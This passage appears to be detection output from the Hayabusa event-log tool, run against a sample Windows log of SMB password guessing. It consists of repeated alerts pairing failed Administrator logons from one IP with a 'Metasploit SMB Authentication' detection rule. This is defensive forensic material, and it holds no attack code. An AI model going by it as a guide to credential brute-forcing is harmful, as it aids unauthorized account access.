Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 